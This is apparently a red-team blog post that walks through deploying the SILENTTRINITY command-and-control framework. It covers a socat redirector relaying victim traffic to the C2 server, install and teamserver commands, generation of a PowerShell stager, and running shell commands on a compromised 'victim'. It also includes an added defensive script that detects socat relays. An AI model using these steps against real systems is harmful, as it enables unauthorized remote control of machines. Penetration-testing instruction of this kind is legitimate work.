Fifth step in setting up a C2 environment. Using socat as a front to SILENTTRINITY. Command and Control my way. @c2_matrix @byt3bl33d3r @porchetta_ind #pentest #pentesting #redteam #infosec

Now we are going to look at SILENTTRINITY from @byt3bl33d3r. I think this will be the last test of a Command and Control application; I have other stuff to do. But I hope you all had a good read and that it set some things in motion for you.

Here is the link where you can read about and download SILENTTRINITY: https://github.com/byt3bl33d3r/SILENTTRINITY

A picture says more than 1000 words, so let's start with that!

SILENTTRINITY

The steps!

  1. Run socat for the external access from victim to C2
  2. Install Kali
  3. Install SILENTTRINITY
  4. Create listeners
  5. Create payloads
  6. Run payloads
  7. Take over the machine

Socat

Go back a few blog posts for more information about socat.

sudo socat TCP4-LISTEN:80,fork,reuseaddr TCP:172.21.21.41:80
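
Seen from the box running the relay, this forwarder is just a socat process with a listen address and a connect address, so it is easy to find in a process listing. The script below is an added example, not part of the original post or of SILENTTRINITY; the function names and the sample process listing are constructed for illustration.

```shell
#!/bin/sh
# Added example: flag socat processes that relay a listening TCP port to
# another host, like the redirector command above.

# Reads "PID ARGS..." lines on stdin (the format of `ps -eo pid=,args=`) and
# prints "pid listen_port target_host target_port" for every TCP relay found.
# Handles IPv4/hostname targets only (no bracketed IPv6 literals).
find_socat_relays() {
    awk '
    {
        pid = $1; is_socat = 0; lport = ""; thost = ""; tport = ""
        for (i = 2; i <= NF; i++) {
            arg = $i
            # Executable name, with or without a path (sudo socat, /usr/bin/socat).
            if (arg == "socat" || arg ~ /\/socat$/) { is_socat = 1; continue }
            if (!is_socat) continue
            # Drop socat address options such as ",fork,reuseaddr".
            sub(/,.*/, "", arg)
            n = split(arg, part, ":")
            kind = toupper(part[1])   # socat address keywords are case-insensitive
            if (kind ~ /^TCP[46]?-(LISTEN|L)$/ && n >= 2) {
                lport = part[n]
            } else if (kind ~ /^TCP[46]?(-CONNECT)?$/ && n == 3) {
                thost = part[2]; tport = part[3]
            }
        }
        # Report only when both halves of a relay are present.
        if (is_socat && lport != "" && thost != "")
            print pid, lport, thost, tport
    }'
}

# Constructed sample listing (PIDs and the non-socat lines are made up).
sample_ps() {
    cat <<'EOF'
 812 /usr/sbin/sshd -D
1377 sudo socat TCP4-LISTEN:80,fork,reuseaddr TCP:172.21.21.41:80
1412 socat TCP4-LISTEN:80,fork,reuseaddr TCP:172.21.21.41:80
2040 socat - UNIX-CONNECT:/run/app.sock
2051 grep socat
EOF
}

# On a live host: ps -eo pid=,args= | find_socat_relays
sample_ps | find_socat_relays
```
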

Server

Let's jump into the installation of SILENTTRINITY.

Git Clone the stuff

git clone https://github.com/byt3bl33d3r/SILENTTRINITY.git

Install

Time to do some pip3. I also tried to install this on a clean Ubuntu 20.10, but got some errors about Python crypto stuff, cffi modules and so on. This worked directly on a Kali box. I fixed that with the command below:

sudo apt-get install build-essential libssl-dev libffi-dev python-dev

Time to install.

pip3 install --user pipenv && pipenv install && pipenv shell
Install 2

Run the server

pipenv shell

python3.9 st.py teamserver 172.21.21.40 password

server

Client

Client
client 2

Time to connect to the teamserver from the client

teamservers
connect wss://roger:password@172.21.21.40:5000

Client Connect

Type list to see the connection

list

Time to create a listener for our victim to connect to. Type list under listeners to see what listeners you have.

listeners
list -a

listeners

This time we use the http one, with the commands below:

use http
options

options listeners

Create the payload, or stager as it is called here

stager
list

stager

Generate the stager for the listener http

use powershell_stageless
generate http

stager

Victim

Now take this stager.ps1 and put this on the victim in some way. Use your own imagination how to do that. www, ftp, floppy, cd or irc…

Run it on the client

Go back to the SILENTTRINITY client to interact with the victim

See active sessions and list them. The name here is important, we use that name when we run our modules.

sessions
list

sessions

How to use a module on a connected victim

modules
list

modules

Use the module and run it.

use boo/shell
options
set Command whoami

run

So this was the last C2 in this round. I hope in the future I will have time to test some more C2 stuff.

Keep hacking!

//Roger
